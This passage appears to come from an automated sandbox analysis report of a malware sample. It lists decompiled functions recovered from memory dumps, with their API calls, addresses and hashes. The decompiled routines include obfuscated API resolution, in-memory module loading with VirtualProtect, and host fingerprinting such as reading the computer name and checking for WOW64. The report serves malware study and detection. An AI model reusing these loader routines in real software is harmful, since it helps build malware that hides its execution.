Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 078f625caaeaa914abf25320e1ace39788bc17e509191748ed5643f071b3f8b1
Instruction ID: bcccd257e4f5e23db07bfe7816034b0afb8c3642facf0240440d11f9a3e13dab
Opcode Fuzzy Hash: 078f625caaeaa914abf25320e1ace39788bc17e509191748ed5643f071b3f8b1
Instruction Fuzzy Hash: D0315876900119BFCB21DFA9C888D9BBB7AFFE97407154658F8159B210E331DD91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000135A, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000135A() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x10004150;
				if( *0x1000412c > 5) {
					_t16 = _t15 + 0x100050f9;
				} else {
					_t16 = _t15 + 0x100050b1;
				}
				E10001FE7(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E10001414( &_v32,  &_v16,  *0x1000414c ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x10004138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E1000102F(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x10004138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E1000200D(_t44, _t32 + 4);
						}
					}
					_t25 = E10001E11(_v28); // executed
				}
				ExitThread(_t25);
			}

0x10001360
0x10001371
0x1000137b
0x10001373
0x10001373
0x10001373
0x10001382
0x1000138b
0x10001390
0x100013ae
0x10001405
0x100013b0
0x100013b6
0x100013bc
0x100013ca
0x100013ce
0x100013d5
0x100013d7
0x100013e3
0x100013e5
0x100013f4
0x100013e7
0x100013ed
0x100013ed
0x100013e5
0x100013fc
0x100013fc
0x10001407

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 100013B6
ExitThread.KERNEL32 ref: 10001407

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: bbc03089cd780e3a685a91eb4c0c862dad5948ab76aa5244e081fc2d8405439e
Instruction ID: 2ce771c5e16d54c3ab671480280001d27b24c2f2c6965729a5a09e13ad1247cb
Opcode Fuzzy Hash: bbc03089cd780e3a685a91eb4c0c862dad5948ab76aa5244e081fc2d8405439e
Instruction Fuzzy Hash: D71149B1908245ABF711DBA4CC899CBB7ECEB483C0F02482AF555D7169EB30E6858B55

Uniqueness

Uniqueness Score: -1.00%

Function 001CA6A5, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 001CA6CD

Part of subcall function 001C9152: SysFreeString.OLEAUT32(?), ref: 001C9231

SafeArrayDestroy.OLEAUT32(?), ref: 001CA71A

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: 67e0b4fbd7e00b3b84368adb8ec102db59e3fdde05a88db230bf98506cbcf151
Instruction ID: fcaf720283962771e0aabbce87c8efaf5eac0318fd3c13a7768b6bbae93e3b7f
Opcode Fuzzy Hash: 67e0b4fbd7e00b3b84368adb8ec102db59e3fdde05a88db230bf98506cbcf151
Instruction Fuzzy Hash: AB117C72A0010ABFDB119FA4CC49EAEBBB8FF18310F058029FA00E6161E375DA55DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001C89D6, Relevance: 3.0, APIs: 2, Instructions: 49
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E001C89D6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				signed short* _t25;

				_t23 = __edx;
				_t24 = E001C809F(0, _a12);
				if(_t24 == 0) {
					_t21 = 8;
				} else {
					_t25 = _t24 + _a16 * 2;
					 *_t25 =  *_t25 & 0x00000000;
					_t21 = E001C904E(__ecx, _a4, _a8, _t24);
					if(_t21 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_push( &_v12);
						 *_t25 = 0x5f;
						_t20 = E001CA635(_t23, 8, _a4, 0x80000001, _a8, _t24); // executed
						_t21 = _t20;
					}
					HeapFree( *0x1cd238, 0, _t24);
				}
				return _t21;
			}

0x001c89d6
0x001c89e9
0x001c89ed
0x001c8a47
0x001c89ef
0x001c89f6
0x001c89fc
0x001c8a05
0x001c8a09
0x001c8a0f
0x001c8a18
0x001c8a1d
0x001c8a2d
0x001c8a32
0x001c8a32
0x001c8a3d
0x001c8a3d
0x001c8a4e

APIs

Part of subcall function 001C809F: lstrlen.KERNEL32(?,00000000,001CD330,00000001,001C2200,001CD00C,001CD00C,00000000,00000005,00000000,00000000,?,?,?,001C96C1,001C23E9), ref: 001C80A8
Part of subcall function 001C809F: mbstowcs.NTDLL ref: 001C80CF
Part of subcall function 001C809F: memset.NTDLL ref: 001C80E1

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,766F1499,00000000,00000008,00000014,004F0053,033495A4), ref: 001C8A0F
HeapFree.KERNEL32(00000000,00000000,004F0053), ref: 001C8A3D

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 3bc671ac8daaed6e9ca8be99442bda1e288285ec54ab4cf423aa6b6f7a8e3afc
Instruction ID: 0abc982cd5e2e576cbea8550bbe80554c8ff525fd51b7f31483bb264506d730f
Opcode Fuzzy Hash: 3bc671ac8daaed6e9ca8be99442bda1e288285ec54ab4cf423aa6b6f7a8e3afc
Instruction Fuzzy Hash: 2C017C32600209BADF216FA89C89F9A7FB9EF94704F104429FA009A151EBB1D9658750

Uniqueness

Uniqueness Score: -1.00%

Function 001C54BC, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E001C54BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E001C2049(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E001C9039(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x001c54c1
0x001c54cc
0x001c54ce
0x001c54d4
0x001c54d6
0x001c54db
0x001c54e4
0x001c54e8
0x001c54f1
0x001c54f5
0x001c5504
0x001c54f7
0x001c54f8
0x001c54fd
0x001c54fd
0x001c54f5
0x001c54e8
0x001c550d

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,001CA306,7671BB27,00000000,?,?,001CA306), ref: 001C54D4

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

GetComputerNameExA.KERNELBASE(00000003,00000000,001CA306,001CA307,?,?,001CA306), ref: 001C54F1

Part of subcall function 001C9039: HeapFree.KERNEL32(00000000,00000000,001C7F18), ref: 001C9045

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 1a44f9b28a74c36e440a0575f13853b2ae6f33b9deb0ac2465bb8c7d0dd35bef
Instruction ID: 9d25ca6753e8755b78a847d0e05d3988fa42b6e6b233297283b22b2dd3c65311
Opcode Fuzzy Hash: 1a44f9b28a74c36e440a0575f13853b2ae6f33b9deb0ac2465bb8c7d0dd35bef
Instruction Fuzzy Hash: 1BF05E26600509FBEB11D6AA9C01FAF7AAEDBE5B50F21006EF904D3140EB70EE0197B1

Uniqueness

Uniqueness Score: -1.00%

Function 001C6B96, Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001C6B96(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t9;
				signed int _t11;
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t19;

				_t9 =  *0x1cd284;
				_v8 = _v8 & 0x00000000;
				_t19 =  *0x1cd254; // 0x150
				if(_t9 != 0) {
					L2:
					if(_t19 != 0) {
						_t11 = _t9->i(_t19,  &_v8); // executed
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x1cd27c; // 0x317a7d0
				_t3 = _t12 + 0x1ce0af; // 0x4e52454b
				_t9 = GetModuleHandleA(_t3);
				_t16 =  *0x1cd27c; // 0x317a7d0
				_t4 = _t16 + 0x1cea06; // 0x6f577349
				 *0x1cd274 = _t9;
				__imp__(_t9, _t4);
				 *0x1cd284 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x001c6b9a
0x001c6b9f
0x001c6ba6
0x001c6bac
0x001c6be2
0x001c6be4
0x001c6beb
0x001c6bef
0x001c6bf1
0x001c6bf1
0x001c6bef
0x001c6bf4
0x001c6bf9
0x001c6bf9
0x001c6bae
0x001c6bb3
0x001c6bba
0x001c6bc0
0x001c6bc6
0x001c6bce
0x001c6bd3
0x001c6bdb
0x001c6be0
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,001C6AE6,?,00000001,?,?,?,001C807D,?), ref: 001C6BBA
IsWow64Process.KERNELBASE(00000150,00000000,00000000,?,?,001C6AE6,?,00000001,?,?,?,001C807D,?), ref: 001C6BEB

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: HandleModuleProcessWow64
String ID:
API String ID: 213853744-0
Opcode ID: ed40e8156d89f9010e44dd22418d7a457da18b8bf93f525e678b19bd63ffbab3
Instruction ID: 08aaf11cd1fff80cb29685f3135ebc87138f48c70421d7146af22e240abf149b
Opcode Fuzzy Hash: ed40e8156d89f9010e44dd22418d7a457da18b8bf93f525e678b19bd63ffbab3
Instruction Fuzzy Hash: CFF06275A01206DFDB10CB68ED09FAABBECEB58305B12006CF505D3521E730EE41DB54

Uniqueness

Uniqueness Score: -1.00%

Function 001C8055, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x1cd23c) == 0) {
						E001C970F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x1cd23c) == 1) {
						_t10 = E001C6A56(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x001c805c
0x001c805d
0x001c8060
0x001c8092
0x001c8094
0x001c8094
0x001c8062
0x001c8063
0x001c8078
0x001c807f
0x001c8081
0x001c8081
0x001c807f
0x001c8063
0x001c809c

APIs

InterlockedIncrement.KERNEL32(001CD23C), ref: 001C806A

Part of subcall function 001C6A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,001C807D,?), ref: 001C6A69

InterlockedDecrement.KERNEL32(001CD23C), ref: 001C808A

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: b98c8d7a0185913da3c7ef5c3b22ec54a57734c65f22b2d220355914c8f8dd26
Instruction ID: 10b472a3b01650c93ea01ae5484755b0c214ba725367d5567135774756c788b5
Opcode Fuzzy Hash: b98c8d7a0185913da3c7ef5c3b22ec54a57734c65f22b2d220355914c8f8dd26
Instruction Fuzzy Hash: 99E0CD7D354B6197C7316B749C88F5EAA54AF30F80F05442CF689D50A0CF10DCB496D1

Uniqueness

Uniqueness Score: -1.00%

Function 001C43DF, Relevance: 1.6, APIs: 1, Instructions: 79
comCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E001C43DF(void* __ebx, void* __ecx, void* __edi, signed int _a4) {
				signed int _v8;
				signed int _t20;
				intOrPtr _t21;
				signed int _t23;
				intOrPtr* _t25;
				signed int _t26;
				intOrPtr* _t27;
				signed int _t29;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t36;
				intOrPtr* _t41;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr* _t50;
				intOrPtr* _t52;

				_t52 = E001C2049(0xc);
				if(_t52 == 0) {
					_t20 = 8;
				} else {
					_t21 =  *0x1cd27c; // 0x317a7d0
					_t1 = _t21 + 0x1ce058; // 0x3348828
					_t2 = _t21 + 0x1ce028; // 0x2df01
					_t23 =  *0x1cd15c(_t2, 0, 4, _t1, _t52); // executed
					_v8 = _t23;
					if(_t23 < 0) {
						L8:
						E001C9039(_t52);
						_t20 = _v8;
					} else {
						_t44 =  *0x1cd27c; // 0x317a7d0
						_t25 =  *_t52;
						_t4 = _t52 + 4; // 0x4
						_t36 = _t4;
						_t5 = _t44 + 0x1ce048; // 0xd30c1661
						_t26 =  *((intOrPtr*)( *_t25))(_t25, _t5, _t36, __edi, __ebx);
						_v8 = _t26;
						_t27 =  *_t52;
						_t41 =  *_t27;
						if(_t26 < 0) {
							L6:
							 *((intOrPtr*)(_t41 + 8))(_t27);
						} else {
							_t46 =  *0x1cd27c; // 0x317a7d0
							_t7 = _t52 + 8; // 0x8
							_t50 = _t7;
							_t8 = _t46 + 0x1ce068; // 0x2df05
							_t29 =  *_t41(_t27, _t8, _t50);
							_v8 = _t29;
							if(_t29 < 0) {
								_t30 =  *_t36;
								 *((intOrPtr*)( *_t30 + 8))(_t30);
								_t27 =  *_t52;
								_t41 =  *_t27;
								goto L6;
							} else {
								_t32 =  *_t50;
								 *((intOrPtr*)( *_t32 + 0xa4))(_t32, 0);
								_a4 = _a4 & 0x00000000;
								 *_a4 = _t52;
							}
						}
						if(_v8 >= 0) {
							_t20 = _a4;
						} else {
							goto L8;
						}
					}
				}
				return _t20;
			}

0x001c43eb
0x001c43ef
0x001c4497
0x001c43f5
0x001c43f5
0x001c43fb
0x001c4406
0x001c440d
0x001c4415
0x001c4418
0x001c448a
0x001c448b
0x001c4490
0x001c441a
0x001c441a
0x001c4420
0x001c4426
0x001c4426
0x001c442a
0x001c4432
0x001c4434
0x001c4439
0x001c443b
0x001c443d
0x001c447e
0x001c447f
0x001c443f
0x001c443f
0x001c4445
0x001c4445
0x001c4449
0x001c4451
0x001c4455
0x001c4458
0x001c4472
0x001c4477
0x001c447a
0x001c447c
0x00000000
0x001c445a
0x001c445a
0x001c4461
0x001c446a
0x001c446e
0x001c446e
0x001c4458
0x001c4488
0x001c449a
0x00000000
0x00000000
0x00000000
0x001c4488
0x001c4418
0x001c449f

APIs

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

CoCreateInstance.OLE32(0002DF01,00000000,00000004,03348828,00000000), ref: 001C440D

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateCreateHeapInstance
String ID:
API String ID: 2928441540-0
Opcode ID: b3438a3db56b2f8a176cabf6d9d68d1f37243f2f95f7ddcd3ad6886da84b9853
Instruction ID: 0cc588bb091c9e54c6e9f5419b78711853c2931aa0dc5b283830e6ae56b36747
Opcode Fuzzy Hash: b3438a3db56b2f8a176cabf6d9d68d1f37243f2f95f7ddcd3ad6886da84b9853
Instruction Fuzzy Hash: 182137B5600204EFD714CFA4D898F9A77A8FFA9700F258568F605CB250D775EA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C9318, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E001C9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x1cd27c; // 0x317a7d0
				_t4 = _t15 + 0x1ce39c; // 0x3348b6c
				_t20 = _t4;
				_t6 = _t15 + 0x1ce124; // 0x650047
				_t17 = E001C9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E001C9FC9(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x001c9322
0x001c9324
0x001c932b
0x001c932c
0x001c932d
0x001c932e
0x001c9334
0x001c9339
0x001c9339
0x001c9343
0x001c9355
0x001c935c
0x001c938b
0x001c935e
0x001c9363
0x001c9388
0x001c9365
0x001c9368
0x001c936f
0x001c937a
0x001c9371
0x001c9374
0x001c9374
0x001c937e
0x001c937e
0x001c9363
0x001c9392

APIs

Part of subcall function 001C9152: SysFreeString.OLEAUT32(?), ref: 001C9231

Part of subcall function 001C9FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,001C7946,004F0053,00000000,?), ref: 001C9FD2
Part of subcall function 001C9FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,001C7946,004F0053,00000000,?), ref: 001C9FFC
Part of subcall function 001C9FC9: memset.NTDLL ref: 001CA010

SysFreeString.OLEAUT32(00000000), ref: 001C937E

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 2fe391c287c671c847bee8c9405f1f10d370f3de16444711a8937607b88bb6a2
Instruction ID: c5ce0b3a414b2b06ae5a9c9baff570768471ac78f09c95c54ee62ffd49ea9bcb
Opcode Fuzzy Hash: 2fe391c287c671c847bee8c9405f1f10d370f3de16444711a8937607b88bb6a2
Instruction Fuzzy Hash: EC019E32500059BBCB119FA8CC08EAEBBB8FB54710B05486AE911E60A0D370D954C791

Uniqueness

Uniqueness Score: -1.00%

Function 10001FE7, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10001FE7(void* __eax, intOrPtr _a4) {

				 *0x10004148 =  *0x10004148 & 0x00000000;
				_push(0);
				_push(0x10004144);
				_push(1);
				_push(_a4);
				 *0x10004140 = 0xc; // executed
				L10001BD6(); // executed
				return __eax;
			}

0x10001fe7
0x10001fee
0x10001ff0
0x10001ff5
0x10001ff7
0x10001ffb
0x10002005
0x1000200a

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(10001387,00000001,10004144,00000000), ref: 10002005

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 797134a9b1f988486b15df9cd10c437d68bca56e1d0ccba6a6193b38078adc0e
Instruction ID: 77fc3a402b1b28792d7a6ab77bf10cd6ea7ed93b7dc72413e294461ac678640d
Opcode Fuzzy Hash: 797134a9b1f988486b15df9cd10c437d68bca56e1d0ccba6a6193b38078adc0e
Instruction Fuzzy Hash: 87C048F8140310ABF620DB019C86FC57AA2B7A4789F224508F200262E8DBB920988A2D

Uniqueness

Uniqueness Score: -1.00%

Function 10001E11, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10001E11(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x1000414c;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x1000414c - 0x63698bc4 &  !( *0x1000414c - 0x63698bc4);
				_t18 = E10001A0F( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x1000414c - 0x63698bc4 &  !( *0x1000414c - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x1000414c - 0x63698bc4 &  !( *0x1000414c - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E1000125B(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E10001745(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E10001179(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E10001DFC(_t42);
					L8:
					return _t29;
				}
			}

0x10001e19
0x10001e1b
0x10001e37
0x10001e48
0x10001e4f
0x10001ead
0x00000000
0x10001e51
0x10001e51
0x10001e5b
0x10001e5f
0x10001e64
0x10001e6c
0x10001e70
0x10001e75
0x10001e7a
0x10001e7e
0x10001e83
0x10001e84
0x10001e88
0x10001e8d
0x10001e95
0x10001e95
0x10001e8d
0x10001e7e
0x10001e70
0x10001e97
0x10001ea0
0x10001ea4
0x10001eae
0x10001eb4
0x10001eb4

APIs

Part of subcall function 10001A0F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001E4D,?,?,?,?,?,00000002,?,10001401), ref: 10001A33
Part of subcall function 10001A0F: GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001A55
Part of subcall function 10001A0F: GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001A6B
Part of subcall function 10001A0F: GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001A81
Part of subcall function 10001A0F: GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001A97
Part of subcall function 10001A0F: GetProcAddress.KERNEL32(00000000,?,?,?,?,10001E4D,?,?,?,?,?,00000002), ref: 10001AAD

Part of subcall function 1000125B: memcpy.NTDLL(?,?,?), ref: 10001288
Part of subcall function 1000125B: memcpy.NTDLL(?,?,?), ref: 100012BB

Part of subcall function 10001745: LoadLibraryA.KERNEL32(?), ref: 1000177D

Part of subcall function 10001179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 100011B2
Part of subcall function 10001179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001227
Part of subcall function 10001179: GetLastError.KERNEL32 ref: 1000122D

GetLastError.KERNEL32(?,10001401), ref: 10001E8F

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 0740a9f17521f8df7bbe915c9895f6c6409a621ade32a0bd2e8e166a0619371c
Instruction ID: 2043a04cbec374512fa6f71088344ccde69893edc298cb54b1ed822475c5d404
Opcode Fuzzy Hash: 0740a9f17521f8df7bbe915c9895f6c6409a621ade32a0bd2e8e166a0619371c
Instruction Fuzzy Hash: 5A112B7A700756ABE321DBA9CC80DDF77BCEF892947054129FD0197649EAB0FD0687A0

Uniqueness

Uniqueness Score: -1.00%

Function 001C21CD, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001C21CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x1cd330;
				E001C84D5();
				while(1) {
					_t8 = E001C12D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E001C809F(_t14);
					if(_t15 == 0) {
						HeapFree( *0x1cd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E001C84D5();
					if(_t19 != 0) {
						_t22 =  *0x1cd338; // 0x3349da8
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x001c21d5
0x001c21d9
0x001c21da
0x001c21db
0x001c21e0
0x001c21e5
0x001c21ec
0x001c21f3
0x00000000
0x00000000
0x001c21f5
0x001c21fa
0x001c21fb
0x001c2202
0x001c221c
0x00000000
0x001c2204
0x001c2204
